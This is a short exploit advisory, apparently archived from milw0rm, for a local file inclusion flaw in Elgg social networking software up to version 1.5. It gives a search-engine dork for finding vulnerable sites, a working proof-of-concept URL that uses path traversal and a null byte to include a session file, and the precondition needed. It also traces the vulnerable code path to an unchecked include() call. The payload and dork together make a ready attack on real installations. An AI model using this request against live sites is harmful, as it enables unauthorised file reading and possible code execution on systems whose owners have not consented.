1 Product: elgg.org
2 Version: <= 1.5
3 Dork: "Powered by Elgg, the leading open source social networking platform"
4
5 eLwaux(c)2009
6 UASC.org.UA
7
8 POC: /_css/js.php?js=../../../../tmp/session_dir%00&viewtype=xD
9
10 need: in table ‘datalists‘ must be record ‘simplecache_enabled‘ = 0
11 (default ‘simplecache_enabled ‘ = 1)
12
13 Vulnerability Code:
14 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
15 /_css/js.php:
16 33: $viewinput[’view’] = ’js/’ . $_GET[’js’];
17 42: require_once(dirname(dirname(__FILE__)) . ’/simplecache/view.php’);
18 /simplecache/view.php:
19 26: $view = $viewinput[’view’];
20 30: if (@mysql_select_db($CONFIG−>dbname,$mysql_dblink)) {
21 48: if ($simplecache_enabled || $override) {
22 49: $filename = $dataroot . ’views_simplecache/’ . md5($viewtype . $view);
23 51: $contents = file_get_contents($filename);
24 56: } else {
25 59: $contents = elgg_view($view);
26 /lib/elgglib.php:
27 237: function elgg_view($view, ..
28 317: foreach($viewlist as $priority => $view) {
29 321: if (file_exists($view_location . "{$viewtype}/{$view}.php") &&
30 !include($view_location . "{$viewtype}/{$view}.php")) {
31 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
32
33 # milw0rm.com [2009−08−04]
Page 1/1
elgg 1.5 _cssjs.php Local File Inclusion Vulnerability
eLwaux
08/04/2009